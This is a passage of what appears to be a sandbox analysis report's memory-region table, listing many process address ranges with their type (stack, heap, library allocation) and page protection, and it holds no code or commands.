page read and write
|
||
4A4EB7E000
|
stack
|
page read and write
|
||
21780F40000
|
trusted library allocation
|
page read and write
|
||
28620CE000
|
stack
|
page read and write
|
||
107067E000
|
stack
|
page read and write
|
||
7FFC013D0000
|
trusted library allocation
|
page read and write
|
||
20DC2940000
|
trusted library allocation
|
page read and write
|
||
15EC229D000
|
trusted library allocation
|
page read and write
|
||
2427BD10000
|
trusted library allocation
|
page read and write
|
||
2CA427F000
|
stack
|
page read and write
|
||
3BA987E000
|
stack
|
page read and write
|
||
43E72FF000
|
stack
|
page read and write
|
||
7FFC013F0000
|
trusted library allocation
|
page read and write
|
||
3BA997F000
|
stack
|
page read and write
|
||
7FFC01390000
|
trusted library allocation
|
page read and write
|
||
20388978000
|
heap
|
page read and write
|
||
20DA89DA000
|
heap
|
page read and write
|
||
19036002000
|
heap
|
page read and write
|
||
20DC29B0000
|
trusted library allocation
|
page read and write
|
||
20DC2E00000
|
heap
|
page read and write
|
||
2860F7E000
|
stack
|
page read and write
|
||
1AD07E000
|
stack
|
page read and write
|
||
4A4E1BB000
|
stack
|
page read and write
|
||
7FFC013D0000
|
trusted library allocation
|
page read and write
|
||
4A4E6FB000
|
stack
|
page read and write
|
||
63E5BF7000
|
stack
|
page read and write
|
||
15EC1C20000
|
heap
|
page execute and read and write
|
||
28560C58000
|
heap
|
page read and write
|
||
19035B4D000
|
heap
|
page read and write
|
||
20DC29C0000
|
trusted library allocation
|
page read and write
|
||
2427BCD0000
|
trusted library allocation
|
page read and write
|
||
15EC1C40000
|
heap
|
page read and write
|
||
2489A000000
|
heap
|
page read and write
|
||
19035BA8000
|
heap
|
page read and write
|
||
190354EA000
|
heap
|
page read and write
|
||
24200B39000
|
trusted library allocation
|
page read and write
|
||
2E93FA0A000
|
heap
|
page read and write
|
||
20DC33C7000
|
trusted library allocation
|
page read and write
|
||
28616BC000
|
stack
|
page read and write
|
||
7FFC01335000
|
trusted library allocation
|
page read and write
|
||
24899E70000
|
heap
|
page read and write
|
||
2D584B60000
|
trusted library allocation
|
page read and write
|
||
24905E60000
|
heap
|
page read and write
|
||
2489A064000
|
heap
|
page read and write
|
||
286163F000
|
stack
|
page read and write
|
||
19035B96000
|
heap
|
page read and write
|
||
2E93FC15000
|
heap
|
page read and write
|
||
20DC29A0000
|
trusted library allocation
|
page read and write
|
||
24210001000
|
trusted library allocation
|
page read and write
|
||
7FFC011A0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFC010E0000
|
trusted library allocation
|
page read and write
|
||
2038897F000
|
heap
|
page read and write
|
||
190359E0000
|
remote allocation
|
page read and write
|
||
1DD55615000
|
heap
|
page read and write
|
||
286153F000
|
stack
|
page read and write
|
||
24279AC0000
|
unkown
|
page readonly
|
||
2489A089000
|
heap
|
page read and write
|
||
15ED9F23000
|
heap
|
page read and write
|
||
20DC32D0000
|
trusted library allocation
|
page read and write
|
||
2489A108000
|
heap
|
page read and write
|
||
211D884D000
|
heap
|
page read and write
|
||
20DAB8A6000
|
trusted library allocation
|
page read and write
|
||
7FFC012B0000
|
trusted library allocation
|
page execute and read and write
|
||
21780865000
|
heap
|
page read and write
|
||
1ACDAC000
|
stack
|
page read and write
|
||
7FFC01110000
|
trusted library allocation
|
page read and write
|
||
20DAB816000
|
trusted library allocation
|
page read and write
|
||
19036002000
|
heap
|
page read and write
|
||
28560B20000
|
heap
|
page read and write
|
||
28612BF000
|
stack
|
page read and write
|
||
20DC29B0000
|
trusted library allocation
|
page read and write
|
||
24200B9B000
|
trusted library allocation
|
page read and write
|
||
2D584C71000
|
heap
|
page read and write
|
||
20DC29B0000
|
trusted library allocation
|
page read and write
|
||
1B56A44B000
|
heap
|
page read and write
|
||
4A4E5FB000
|
stack
|
page read and write
|
||
20DC2950000
|
trusted library allocation
|
page read and write
|
||
1DD5A320000
|
trusted library allocation
|
page read and write
|
||
19035485000
|
heap
|
page read and write
|
||
28560D02000
|
heap
|
page read and write
|
||
2E9417F0000
|
heap
|
page read and write
|
||
20388BD9000
|
heap
|
page read and write
|
||
1DD5A460000
|
trusted library allocation
|
page read and write
|
||
20DC33D0000
|
trusted library allocation
|
page read and write
|
||
20DA89E8000
|
heap
|
page read and write
|
||
15ED9E73000
|
heap
|
page read and write
|
||
2490603D000
|
heap
|
page read and write
|
||
2E941E70000
|
heap
|
page read and write
|
||
15EC1D64000
|
trusted library allocation
|
page read and write
|
||
2489A102000
|
heap
|
page read and write
|
||
EE682FE000
|
stack
|
page read and write
|
||
20DC2980000
|
trusted library allocation
|
page read and write
|
||
7FFC01430000
|
trusted library allocation
|
page read and write
|
||
1DD54EAA000
|
heap
|
page read and write
|
||
20DC3290000
|
trusted library allocation
|
page read and write
|
||
24201494000
|
trusted library allocation
|
page read and write
|
||
2E941EB9000
|
heap
|
page read and write
|
||
20DC3080000
|
trusted library allocation
|
page read and write
|
||
10CB3FF000
|
stack
|
page read and write
|
||
7FFC01360000
|
trusted library allocation
|
page read and write
|
||
FD70BBB000
|
stack
|
page read and write
|
||
7FFC01397000
|
trusted library allocation
|
page read and write
|
||
1DD555F3000
|
trusted library allocation
|
page read and write
|
||
7FFC01430000
|
trusted library allocation
|
page read and write
|
||
217807E0000
|
heap
|
page read and write
|
||
7FFC01380000
|
trusted library allocation
|
page read and write
|
||
19035516000
|
heap
|
page read and write
|
||
20DC3320000
|
trusted library allocation
|
page read and write
|
||
15EBFE46000
|
heap
|
page read and write
|
||
20DC2ABB000
|
heap
|
page read and write
|
||
C142FF000
|
stack
|
page read and write
|
||
20DC31C0000
|
trusted library allocation
|
page read and write
|
||
211D8841000
|
heap
|
page read and write
|
||
2490608B000
|
heap
|
page read and write
|
||
2427BBA1000
|
trusted library allocation
|
page read and write
|
||
1DD5A400000
|
trusted library allocation
|
page read and write
|
||
63E5CFE000
|
stack
|
page read and write
|
||
21780900000
|
heap
|
page read and write
|
||
7FFC01420000
|
trusted library allocation
|
page read and write
|
||
2E93FA0A000
|
heap
|
page read and write
|
||
1569C880000
|
heap
|
page read and write
|
||
20DC2A75000
|
heap
|
page read and write
|
||
15EBFDFC000
|
heap
|
page read and write
|
||
7FFC01340000
|
trusted library allocation
|
page read and write
|
||
2427BA2A000
|
heap
|
page read and write
|
||
7FFC01410000
|
trusted library allocation
|
page read and write
|
||
15ED9DF1000
|
trusted library allocation
|
page read and write
|
||
10707F9000
|
stack
|
page read and write
|
||
20DC32B0000
|
trusted library allocation
|
page read and write
|
||
20388880000
|
heap
|
page read and write
|
||
19035429000
|
heap
|
page read and write
|
||
20DC2991000
|
trusted library allocation
|
page read and write
|
||
2E93F9E8000
|
heap
|
page read and write
|
||
1DD54E8E000
|
heap
|
page read and write
|
||
15EC2259000
|
trusted library allocation
|
page read and write
|
||
20DC30A0000
|
trusted library allocation
|
page read and write
|
||
7FFC01103000
|
trusted library allocation
|
page execute and read and write
|
||
63E5DFF000
|
stack
|
page read and write
|
||
15EC17E6000
|
heap
|
page read and write
|
||
20DC2AF5000
|
heap
|
page read and write
|
||
20DA8A92000
|
heap
|
page read and write
|
||
2CA3FBA000
|
stack
|
page read and write
|
||
1DD55CE0000
|
trusted library allocation
|
page read and write
|
||
CD9397E000
|
stack
|
page read and write
|
||
3BA98FE000
|
stack
|
page read and write
|
||
15EBFDB5000
|
heap
|
page read and write
|
||
AED587E000
|
stack
|
page read and write
|
||
20388740000
|
heap
|
page read and write
|
||
F77DFFF000
|
stack
|
page read and write
|
||
211D8845000
|
heap
|
page read and write
|
||
7FFC010FC000
|
trusted library allocation
|
page read and write
|
||
24279C47000
|
heap
|
page read and write
|
||
AED51AB000
|
stack
|
page read and write
|
||
1569C873000
|
heap
|
page read and write
|
||
19035B5C000
|
heap
|
page read and write
|
||
15ED1CB1000
|
trusted library allocation
|
page read and write
|
||
24906075000
|
heap
|
page read and write
|
||
2E93FC10000
|
heap
|
page read and write
|
||
2427BCD0000
|
trusted library allocation
|
page read and write
|
||
2D584C55000
|
heap
|
page read and write
|
||
1B56A453000
|
heap
|
page read and write
|
||
24906088000
|
heap
|
page read and write
|
||
15ED1C60000
|
trusted library allocation
|
page read and write
|
||
43E70FF000
|
stack
|
page read and write
|
||
2427BD9F000
|
heap
|
page read and write
|
||
2E93FA25000
|
heap
|
page read and write
|
||
7FFC01470000
|
trusted library allocation
|
page read and write
|
||
19035B7D000
|
heap
|
page read and write
|
||
20DC2A13000
|
heap
|
page read and write
|
||
7FFC01104000
|
trusted library allocation
|
page read and write
|
||
1DD5A480000
|
remote allocation
|
page read and write
|
||
7FFC01291000
|
trusted library allocation
|
page read and write
|
||
24201550000
|
trusted library allocation
|
page read and write
|
||
20DA8890000
|
remote allocation
|
page read and write
|
||
20DA8B00000
|
trusted library allocation
|
page read and write
|
||
19035B9B000
|
heap
|
page read and write
|
||
7FFC01196000
|
trusted library allocation
|
page read and write
|
||
19035B7C000
|
heap
|
page read and write
|
||
211D884A000
|
heap
|
page read and write
|
||
EB33A7C000
|
stack
|
page read and write
|
||
20DC2960000
|
trusted library allocation
|
page read and write
|
||
19035B71000
|
heap
|
page read and write
|
||
19036002000
|
heap
|
page read and write
|
||
7FFC013C0000
|
trusted library allocation
|
page read and write
|
||
11329200000
|
heap
|
page read and write
|
||
2178085D000
|
heap
|
page read and write
|
||
F77E1FE000
|
stack
|
page read and write
|
||
1B56A42C000
|
heap
|
page read and write
|
||
24279BE0000
|
heap
|
page read and write
|
||
1DD55602000
|
heap
|
page read and write
|
||
19035449000
|
heap
|
page read and write
|
||
2178084A000
|
heap
|
page read and write
|
||
7FFC012A2000
|
trusted library allocation
|
page read and write
|
||
C140FA000
|
stack
|
page read and write
|
||
F77D87B000
|
stack
|
page read and write
|
||
63E5AFE000
|
stack
|
page read and write
|
||
2427B560000
|
trusted library allocation
|
page read and write
|
||
211D8850000
|
heap
|
page read and write
|
||
19035BBB000
|
heap
|
page read and write
|
||
24279AB0000
|
unkown
|
page readonly
|
||
20DC2980000
|
trusted library section
|
page read and write
|
||
2D584D02000
|
heap
|
page read and write
|
||
20DA8A51000
|
heap
|
page read and write
|
||
19035B5C000
|
heap
|
page read and write
|
||
20DC2F20000
|
trusted library allocation
|
page read and write
|
||
20DC32F0000
|
trusted library allocation
|
page read and write
|
||
2E93F990000
|
heap
|
page read and write
|
||
15EC17A0000
|
trusted library allocation
|
page read and write
|
||
2427BD64000
|
heap
|
page read and write
|
||
11329070000
|
heap
|
page read and write
|
||
20DC2980000
|
trusted library allocation
|
page read and write
|
||
2427BF40000
|
heap
|
page read and write
|
||
2427B610000
|
trusted library allocation
|
page read and write
|
||
15EBFD70000
|
heap
|
page read and write
|
||
7FFC012B4000
|
trusted library allocation
|
page read and write
|
||
20DC3240000
|
trusted library allocation
|
page read and write
|
||
2D584B30000
|
heap
|
page read and write
|
||
286157F000
|
stack
|
page read and write
|
||
20DA8A28000
|
heap
|
page read and write
|
||
7FFC012E0000
|
trusted library allocation
|
page read and write
|
||
24906013000
|
heap
|
page read and write
|
||
1DD54F07000
|
heap
|
page read and write
|
||
20DAB5A5000
|
trusted library allocation
|
page read and write
|
||
7FFC013B0000
|
trusted library allocation
|
page read and write
|
||
19036003000
|
heap
|
page read and write
|
||
20DC2940000
|
trusted library allocation
|
page read and write
|
||
20DAB886000
|
trusted library allocation
|
page read and write
|
||
19035B9A000
|
heap
|
page read and write
|
||
24279BBA000
|
heap
|
page read and write
|
||
7FFC012F0000
|
trusted library allocation
|
page read and write
|
||
1DD5A6F0000
|
heap
|
page read and write
|
||
20DC2A98000
|
heap
|
page read and write
|
||
24906000000
|
heap
|
page read and write
|
||
1DD5A590000
|
trusted library allocation
|
page read and write
|
||
7FFC013A0000
|
trusted library allocation
|
page read and write
|
||
203896A0000
|
heap
|
page readonly
|
||
2E93F9E0000
|
heap
|
page read and write
|
||
1B56A481000
|
heap
|
page read and write
|
||
2E9419D6000
|
heap
|
page read and write
|
||
7FFC013E0000
|
trusted library allocation
|
page read and write
|
||
20DC2A90000
|
heap
|
page read and write
|
||
1070779000
|
stack
|
page read and write
|
||
28560C29000
|
heap
|
page read and write
|
||
1DD5A6FB000
|
heap
|
page read and write
|
||
7FFC01315000
|
trusted library allocation
|
page read and write
|
||
24200001000
|
trusted library allocation
|
page read and write
|
||
2427BCE0000
|
trusted library allocation
|
page read and write
|
||
20DC3230000
|
trusted library allocation
|
page read and write
|
||
7FFC013A0000
|
trusted library allocation
|
page read and write
|
||
211D886D000
|
heap
|
page read and write
|
||
15ED9F49000
|
heap
|
page read and write
|
||
19035B99000
|
heap
|
page read and write
|
||
19035B71000
|
heap
|
page read and write
|
||
20DC30B0000
|
trusted library allocation
|
page read and write
|
||
1DD54E29000
|
heap
|
page read and write
|
||
1B56A513000
|
heap
|
page read and write
|
||
15EDA130000
|
heap
|
page read and write
|
||
15EC214D000
|
trusted library allocation
|
page read and write
|
||
2427BBD8000
|
heap
|
page read and write
|
||
113292C3000
|
heap
|
page read and write
|
||
1DD5A190000
|
trusted library allocation
|
page read and write
|
||
20DA89A8000
|
heap
|
page read and write
|
||
20DBA9A4000
|
trusted library allocation
|
page read and write
|
||
20DC3310000
|
trusted library allocation
|
page read and write
|
||
20DAB854000
|
trusted library allocation
|
page read and write
|
||
20DC2991000
|
trusted library allocation
|
page read and write
|
||
15EC1C6B000
|
trusted library allocation
|
page read and write
|
||
19035BD3000
|
heap
|
page read and write
|
||
21780852000
|
heap
|
page read and write
|
||
24906071000
|
heap
|
page read and write
|
||
28560C02000
|
heap
|
page read and write
|
||
2D584C40000
|
heap
|
page read and write
|
||
2E9418D6000
|
heap
|
page read and write
|
||
10CB5FE000
|
stack
|
page read and write
|
||
7FFC01330000
|
trusted library allocation
|
page read and write
|
||
3BA97FD000
|
stack
|
page read and write
|
||
1B56A390000
|
heap
|
page read and write
|
||
1569C830000
|
heap
|
page read and write
|
||
113292BA000
|
heap
|
page read and write
|
||
2D584C75000
|
heap
|
page read and write
|
||
19035B96000
|
heap
|
page read and write
|
||
EE67FFF000
|
stack
|
page read and write
|
||
21780880000
|
heap
|
page read and write
|
||
7FFC01320000
|
trusted library allocation
|
page read and write
|
||
20DAB402000
|
trusted library allocation
|
page read and write
|
||
211D8800000
|
heap
|
page read and write
|
||
2E941DD0000
|
heap
|
page read and write
|
||
7FFC01390000
|
trusted library allocation
|
page read and write
|
||
7FFC01220000
|
trusted library allocation
|
page execute and read and write
|
||
15ED9DF0000
|
trusted library allocation
|
page read and write
|
||
1903544A000
|
heap
|
page read and write
|
||
43E6B6B000
|
stack
|
page read and write
|
||
11329287000
|
heap
|
page read and write
|
||
2489A802000
|
trusted library allocation
|
page read and write
|
||
24906055000
|
heap
|
page read and write
|
||
19035B6A000
|
heap
|
page read and write
|
||
15EBFE05000
|
heap
|
page read and write
|
||
C1387A000
|
stack
|
page read and write
|
||
2E941CB6000
|
heap
|
page read and write
|
||
20DA8A24000
|
heap
|
page read and write
|
||
1569C896000
|
heap
|
page read and write
|
||
2427BD10000
|
trusted library allocation
|
page read and write
|
||
19035B61000
|
heap
|
page read and write
|
||
20DC31D0000
|
trusted library allocation
|
page read and write
|
||
2427B540000
|
trusted library allocation
|
page read and write
|
||
2427BC96000
|
heap
|
page read and write
|
||
4A4E4FE000
|
stack
|
page read and write
|
||
20DC32E0000
|
trusted library allocation
|
page read and write
|
||
190354C1000
|
heap
|
page read and write
|
||
15EBFE48000
|
heap
|
page read and write
|
||
20DC29D0000
|
trusted library allocation
|
page read and write
|
||
2E941EB8000
|
heap
|
page read and write
|
||
28560BE0000
|
remote allocation
|
page read and write
|
||
113292C9000
|
heap
|
page read and write
|
||
2E941C6E000
|
heap
|
page read and write
|
||
1569C880000
|
heap
|
page read and write
|
||
211D8813000
|
heap
|
page read and write
|
||
19035452000
|
heap
|
page read and write
|
||
63E55DD000
|
stack
|
page read and write
|
||
15EBFEBC000
|
heap
|
page read and write
|
||
20DC3360000
|
trusted library allocation
|
page read and write
|
||
15ED9F49000
|
heap
|
page read and write
|
||
20DC33E0000
|
trusted library allocation
|
page read and write
|
||
20DA8B40000
|
heap
|
page execute and read and write
|
||
21780908000
|
heap
|
page read and write
|
||
1DD54EFA000
|
heap
|
page read and write
|
||
20DC2F30000
|
heap
|
page read and write
|
||
2489A002000
|
heap
|
page read and write
|
||
1569C885000
|
heap
|
page read and write
|
||
19035B91000
|
heap
|
page read and write
|
||
1DD55759000
|
heap
|
page read and write
|
||
211D8866000
|
heap
|
page read and write
|
||
2427BD10000
|
trusted library allocation
|
page read and write
|
||
20DC2990000
|
trusted library allocation
|
page read and write
|
||
190351A0000
|
heap
|
page read and write
|
||
15EC1730000
|
heap
|
page read and write
|
||
20DC2AF5000
|
heap
|
page read and write
|
||
7FFC01440000
|
trusted library allocation
|
page read and write
|
||
15EC2010000
|
trusted library allocation
|
page read and write
|
||
19035A02000
|
heap
|
page read and write
|
||
10CB17E000
|
stack
|
page read and write
|
||
24906802000
|
trusted library allocation
|
page read and write
|
||
19035B50000
|
heap
|
page read and write
|
||
F77DCFD000
|
stack
|
page read and write
|
||
1DD54EA6000
|
heap
|
page read and write
|
||
19035B7E000
|
heap
|
page read and write
|
||
20DC3440000
|
trusted library allocation
|
page read and write
|
||
20DC2A3C000
|
heap
|
page read and write
|
||
19035BDC000
|
heap
|
page read and write
|
||
7FFC01330000
|
trusted library allocation
|
page read and write
|
||
2D584D00000
|
heap
|
page read and write
|
||
20DC3210000
|
trusted library allocation
|
page read and write
|
||
28560C00000
|
heap
|
page read and write
|
||
28611FE000
|
stack
|
page read and write
|
||
2E93F9F2000
|
heap
|
page read and write
|
||
7FFC01400000
|
trusted library allocation
|
page read and write
|
||
20DC29A0000
|
trusted library allocation
|
page read and write
|
||
7FFC01440000
|
trusted library allocation
|
page read and write
|
||
28613BD000
|
stack
|
page read and write
|
||
10701FC000
|
stack
|
page read and write
|
||
20DC3280000
|
trusted library allocation
|
page read and write
|
||
20DC3460000
|
trusted library allocation
|
page read and write
|
||
20DC30D0000
|
trusted library allocation
|
page read and write
|
||
20DC29D0000
|
trusted library allocation
|
page read and write
|
||
4A4E77E000
|
stack
|
page read and write
|
||
20DC30D7000
|
trusted library allocation
|
page read and write
|
||
1B56A500000
|
heap
|
page read and write
|
||
20DC3410000
|
trusted library allocation
|
page read and write
|
||
20DC3120000
|
trusted library allocation
|
page read and write
|
||
211D887B000
|
heap
|
page read and write
|
||
7FFC011C0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFC011B0000
|
trusted library allocation
|
page read and write
|
||
2489A053000
|
heap
|
page read and write
|
||
15EC215F000
|
trusted library allocation
|
page read and write
|
||
21780861000
|
heap
|
page read and write
|
||
20DC31A0000
|
trusted library allocation
|
page read and write
|
||
20388920000
|
trusted library allocation
|
page read and write
|
||
2427BCD0000
|
trusted library allocation
|
page read and write
|
||
2860FFE000
|
stack
|
page read and write
|
||
2427B580000
|
trusted library allocation
|
page read and write
|
||
2E9419FC000
|
heap
|
page read and write
|
||
190359E0000
|
remote allocation
|
page read and write
|
||
19035B7D000
|
heap
|
page read and write
|
||
15ED9E50000
|
heap
|
page execute and read and write
|
||
C13778000
|
stack
|
page read and write
|
||
24200068000
|
trusted library allocation
|
page read and write
|
||
211D886B000
|
heap
|
page read and write
|
||
20DC29A0000
|
trusted library allocation
|
page read and write
|
||
21780802000
|
heap
|
page read and write
|
||
AED54FE000
|
stack
|
page read and write
|
||
7FFC01350000
|
trusted library allocation
|
page read and write
|
||
15ED9F2F000
|
heap
|
page read and write
|
||
7FFC01104000
|
trusted library allocation
|
page read and write
|
||
7FFC011B6000
|
trusted library allocation
|
page read and write
|
||
20DBA9C4000
|
trusted library allocation
|
page read and write
|
||
3BA9C7E000
|
stack
|
page read and write
|
||
20DC3140000
|
trusted library allocation
|
page read and write
|
||
211D883E000
|
heap
|
page read and write
|
||
15ED9F4F000
|
heap
|
page read and write
|
||
20DC29A0000
|
trusted library allocation
|
page read and write
|
||
7FFC012F0000
|
trusted library allocation
|
page execute and read and write
|
||
1B56AC02000
|
trusted library allocation
|
page read and write
|
||
7FFC012D0000
|
trusted library allocation
|
page execute and read and write
|
||
20DAB8AE000
|
trusted library allocation
|
page read and write
|
||
20DC2A90000
|
heap
|
page read and write
|
||
19035B7B000
|
heap
|
page read and write
|
||
2178086F000
|
heap
|
page read and write
|
||
20DC29A0000
|
trusted library allocation
|
page read and write
|
||
20DA8890000
|
remote allocation
|
page read and write
|
||
F77D9FC000
|
stack
|
page read and write
|
||
2489A013000
|
heap
|
page read and write
|
||
2427BBF7000
|
heap
|
page read and write
|
||
19035B9B000
|
heap
|
page read and write
|
||
20DABEC2000
|
trusted library allocation
|
page read and write
|
||
15EC1790000
|
heap
|
page readonly
|
||
20DC2991000
|
trusted library allocation
|
page read and write
|
||
CD9337F000
|
stack
|
page read and write
|
||
20DC30F0000
|
trusted library allocation
|
page read and write
|
||
28560B80000
|
heap
|
page read and write
|
||
20DC2990000
|
trusted library allocation
|
page read and write
|
||
19036002000
|
heap
|
page read and write
|
||
24279F25000
|
heap
|
page read and write
|
||
7FFC01370000
|
trusted library allocation
|
page read and write
|
||
20DC33F0000
|
trusted library allocation
|
page read and write
|
||
3BA9305000
|
stack
|
page read and write
|
||
15ED9E56000
|
heap
|
page execute and read and write
|
||
2861438000
|
stack
|
page read and write
|
||
2D584C28000
|
heap
|
page read and write
|
||
7FFC01294000
|
trusted library allocation
|
page read and write
|
||
2CA447F000
|
stack
|
page read and write
|
||
20DC29F0000
|
heap
|
page execute and read and write
|
||
1903543C000
|
heap
|
page read and write
|
||
7FFC01110000
|
trusted library allocation
|
page read and write
|
||
1DD55600000
|
heap
|
page read and write
|
||
15EC20E4000
|
trusted library allocation
|
page read and write
|
||
24200B96000
|
trusted library allocation
|
page read and write
|
||
1DD54F26000
|
heap
|
page read and write
|
||
15EC22C0000
|
trusted library allocation
|
page read and write
|
||
1DD5A62C000
|
heap
|
page read and write
|
||
24279AE0000
|
heap
|
page read and write
|
||
19035B8C000
|
heap
|
page read and write
|
||
7FFC01200000
|
trusted library allocation
|
page execute and read and write
|
||
19035BB4000
|
heap
|
page read and write
|
||
211D884B000
|
heap
|
page read and write
|
||
19035508000
|
heap
|
page read and write
|
||
20DA8830000
|
heap
|
page read and write
|
||
19035B8C000
|
heap
|
page read and write
|
||
7FFC010E3000
|
trusted library allocation
|
page execute and read and write
|
||
1DD55718000
|
heap
|
page read and write
|
||
1569C898000
|
heap
|
page read and write
|
||
1DD5A6AA000
|
heap
|
page read and write
|
||
20DAA4A0000
|
heap
|
page read and write
|
||
19035B71000
|
heap
|
page read and write
|
||
1569C861000
|
heap
|
page read and write
|
||
1DD54E00000
|
heap
|
page read and write
|
||
20DC3260000
|
trusted library allocation
|
page read and write
|
||
2CA4379000
|
stack
|
page read and write
|
||
20DC3340000
|
trusted library allocation
|
page read and write
|
||
24279AD0000
|
unkown
|
page read and write
|
||
1DD55718000
|
heap
|
page read and write
|
||
211D86A0000
|
heap
|
page read and write
|
||
20DC2970000
|
trusted library allocation
|
page read and write
|
||
7FFC012A2000
|
trusted library allocation
|
page read and write
|
||
10CAD7B000
|
stack
|
page read and write
|
||
1DD5A660000
|
heap
|
page read and write
|
||
20389450000
|
trusted library allocation
|
page read and write
|
||
2E93FA59000
|
heap
|
page read and write
|
||
15ED9F32000
|
heap
|
page read and write
|
||
211D8863000
|
heap
|
page read and write
|
||
24906002000
|
heap
|
page read and write
|
||
19035B7D000
|
heap
|
page read and write
|
||
1B56A320000
|
heap
|
page read and write
|
||
15ED9E76000
|
heap
|
page read and write
|
||
20DC2B3B000
|
heap
|
page read and write
|
||
4A4E47E000
|
stack
|
page read and write
|
||
1DD54E73000
|
heap
|
page read and write
|
||
1DD54E54000
|
heap
|
page read and write
|
||
19035BAF000
|
heap
|
page read and write
|
||
20DC3370000
|
trusted library allocation
|
page read and write
|
||
7FFC011C6000
|
trusted library allocation
|
page execute and read and write
|
||
1AD27E000
|
stack
|
page read and write
|
||
1AD6FE000
|
unkown
|
page read and write
|
||
1B56A449000
|
heap
|
page read and write
|
||
19035B72000
|
heap
|
page read and write
|
||
1DD54E3F000
|
heap
|
page read and write
|
||
24905E50000
|
heap
|
page read and write
|
||
190354EA000
|
heap
|
page read and write
|
||
20DC3090000
|
trusted library allocation
|
page read and write
|
||
20DA89B2000
|
heap
|
page read and write
|
||
2489A029000
|
heap
|
page read and write
|
||
24279AD0000
|
unkown
|
page read and write
|
||
19035B8C000
|
heap
|
page read and write
|
||
1DD5A700000
|
heap
|
page read and write
|
||
20DC33B0000
|
trusted library allocation
|
page read and write
|
||
10CAEFF000
|
stack
|
page read and write
|
||
19035210000
|
heap
|
page read and write
|
||
211D884E000
|
heap
|
page read and write
|
||
20DC3330000
|
trusted library allocation
|
page read and write
|
||
20DAA340000
|
trusted library allocation
|
page read and write
|
||
10705F9000
|
stack
|
page read and write
|
||
20DC29D0000
|
trusted library allocation
|
page read and write
|
||
24279BA0000
|
heap
|
page read and write
|
||
15ED9F23000
|
heap
|
page read and write
|
||
7FFC0110D000
|
trusted library allocation
|
page execute and read and write
|
||
1DD5A180000
|
trusted library allocation
|
page read and write
|
||
1903542C000
|
heap
|
page read and write
|
||
28560BE0000
|
remote allocation
|
page read and write
|
||
20DC2981000
|
trusted library allocation
|
page read and write
|
||
1569C897000
|
heap
|
page read and write
|
||
1B56A502000
|
heap
|
page read and write
|
||
20DABD40000
|
trusted library allocation
|
page read and write
|
||
20DC3250000
|
trusted library allocation
|
page read and write
|
||
20DC2991000
|
trusted library allocation
|
page read and write
|
||
7FFC011BC000
|
trusted library allocation
|
page execute and read and write
|
||
211D8851000
|
heap
|
page read and write
|
||
2489A070000
|
heap
|
page read and write
|
||
2427B5D0000
|
heap
|
page read and write
|
||
19035B96000
|
heap
|
page read and write
|
||
24279B30000
|
heap
|
page read and write
|
||
7FFC01360000
|
trusted library allocation
|
page read and write
|
||
19035B76000
|
heap
|
page read and write
|
||
19035B96000
|
heap
|
page read and write
|
||
2CA43FF000
|
stack
|
page read and write
|
||
15ED9E10000
|
trusted library allocation
|
page read and write
|
||
2D584AC0000
|
heap
|
page read and write
|
||
1AD377000
|
stack
|
page read and write
|
||
7FFC01400000
|
trusted library allocation
|
page read and write
|
||
FD711FF000
|
stack
|
page read and write
|
||
19035B99000
|
heap
|
page read and write
|
||
19035B6F000
|
heap
|
page read and write
|
||
19035B75000
|
heap
|
page read and write
|
||
2427BD10000
|
trusted library allocation
|
page read and write
|
||
7FFC012D0000
|
trusted library allocation
|
page execute and read and write
|
||
15ED9E81000
|
heap
|
page read and write
|
||
1DD5A480000
|
remote allocation
|
page read and write
|
||
1DD5A480000
|
trusted library allocation
|
page read and write
|
||
7FFC01430000
|
trusted library allocation
|
page read and write
|
||
15EBFDD3000
|
heap
|
page read and write
|
||
20DC3180000
|
trusted library allocation
|
page read and write
|
||
19035BAA000
|
heap
|
page read and write
|
||
7FFC0129C000
|
trusted library allocation
|
page read and write
|
||
24279C1E000
|
heap
|
page read and write
|
||
19036002000
|
heap
|
page read and write
|
||
20DAA3C0000
|
heap
|
page read and write
|
||
28560B10000
|
heap
|
page read and write
|
||
7FFC01360000
|
trusted library allocation
|
page read and write
|
||
1DD54DC0000
|
trusted library allocation
|
page read and write
|
||
19035B75000
|
heap
|
page read and write
|
||
2178086F000
|
heap
|
page read and write
|
||
7FFC01400000
|
trusted library allocation
|
page read and write
|
||
1AD0FE000
|
stack
|
page read and write
|
||
20DABEB1000
|
trusted library allocation
|
page read and write
|
||
2427BC3E000
|
heap
|
page read and write
|
||
24279C1C000
|
heap
|
page read and write
|
||
1DD5A210000
|
trusted library allocation
|
page read and write
|
||
19035B75000
|
heap
|
page read and write
|
||
1AD67E000
|
stack
|
page read and write
|
||
24279AC0000
|
unkown
|
page readonly
|
||
20DC2A22000
|
heap
|
page read and write
|
||
10CB2FC000
|
stack
|
page read and write
|
||
2E941BD0000
|
heap
|
page read and write
|
||
1DD5A200000
|
trusted library allocation
|
page read and write
|
||
1DD54EA1000
|
heap
|
page read and write
|
||
7FFC01113000
|
trusted library allocation
|
page read and write
|
||
7FFC012E2000
|
trusted library allocation
|
page read and write
|
||
FD713FE000
|
stack
|
page read and write
|
||
1569C885000
|
heap
|
page read and write
|
||
20DC29C0000
|
trusted library allocation
|
page read and write
|
||
15ED9DF0000
|
trusted library allocation
|
page read and write
|
||
19035BA7000
|
heap
|
page read and write
|
||
CD938FE000
|
stack
|
page read and write
|
||
19035BC0000
|
heap
|
page read and write
|
||
CD937F8000
|
stack
|
page read and write
|
||
24279F20000
|
heap
|
page read and write
|
||
43E6E7D000
|
stack
|
page read and write
|
||
20DC31E0000
|
trusted library allocation
|
page read and write
|
||
15ED9E00000
|
trusted library allocation
|
page read and write
|
||
15ED1C51000
|
trusted library allocation
|
page read and write
|
||
CD932FE000
|
stack
|
page read and write
|
||
2427BD10000
|
trusted library allocation
|
page read and write
|
||
211D8842000
|
heap
|
page read and write
|
||
19035B73000
|
heap
|
page read and write
|
||
3BA9AFE000
|
stack
|
page read and write
|
||
20DC29F7000
|
heap
|
page execute and read and write
|
||
20DC2990000
|
trusted library allocation
|
page read and write
|
||
21780780000
|
heap
|
page read and write
|
||
2489A03C000
|
heap
|
page read and write
|
||
20DC29B0000
|
trusted library allocation
|
page read and write
|
||
7FFC01410000
|
trusted library allocation
|
page read and write
|
||
CD92FCE000
|
stack
|
page read and write
|
||
1903546D000
|
heap
|
page read and write
|
||
EE67CFF000
|
stack
|
page read and write
|
||
20DA8A9A000
|
heap
|
page read and write
|
||
2E93FA25000
|
heap
|
page read and write
|
||
211D882C000
|
heap
|
page read and write
|
||
20389690000
|
trusted library allocation
|
page read and write
|
||
190354E7000
|
heap
|
page read and write
|
||
